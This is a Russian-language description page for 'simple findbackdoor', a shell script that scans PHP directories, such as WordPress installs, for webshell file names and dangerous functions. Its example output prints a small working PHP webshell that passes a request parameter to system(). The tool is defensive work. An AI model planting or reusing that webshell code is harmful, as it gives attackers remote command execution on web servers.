simple findbackdoor

Описание simple findbackdoor

Простой скрипт для выявления возможных бэкдоров (backdoor) в файлах PHP. (Хорошо работает для PHP файлов WordPress, например.)

simple findbackdoor осуществляет поиск по потенциально опасным функциям в PHP коде, а также по именам файлов.

Домашняя страница: https://github.com/espreto/simple_findbackdoor

Справка по simple findbackdoor

Испольозвание:

./findbackdoor.sh <директория для сканирования> <1 или 2> <строки>

1 = Искать по именам файлов

2 = Искать по функциям ( <строки> - это количество строк которое нужно вывести до и после подозрительных функций (по умолчанию: 5) )

Руководство по simple findbackdoor

Страница man отсутствует.

Примеры запуска simple findbackdoor

$ ./findbackdoor

   Invalid option!

   Use: ./findbackdoor.sh <directory scan> <1 or 2> <lines>
   1 = WebShells
   2 = Functions ( <lines> is the number of lines before and after the match (default: 5) )

$ ./findbackdoor /tmp/teste/ 1

[+] Possible webshell found!
/tmp/teste/c99.php

$ ./findbackdoor /tmp/teste/ 2

[+] Possible dangerous function!
[+] Last modification in /tmp/teste/ha.php: 2014-10-15 02:14:38.163231500 -0300

1-<?php
2-if(isset($_REQUEST[‘cmd’])){
3-        echo "<pre>";
4-        $cmd = ($_REQUEST[‘cmd’]);
5:        system($cmd);
6-        echo "</pre>";
7-        die;
8-}
9-?>

$ ./findbackdoor /tmp/teste/ 2 1

[+] Possible dangerous function!
[+] Last modification in /tmp/teste/ha.php: 2014-10-15 02:14:38.163231500 -0300

4-        $cmd = ($_REQUEST[‘cmd’]);
5:        system($cmd);
6-        echo "</pre>";

Установка simple findbackdoor

Установка в Linux

git clone https://github.com/espreto/simple_findbackdoor.git
./simple_findbackdoor/findbackdoor

Скриншоты simple findbackdoor

Это утилита командной строки.

Инструкции по simple findbackdoor

Ссылки на инструкции будут добавлены позже.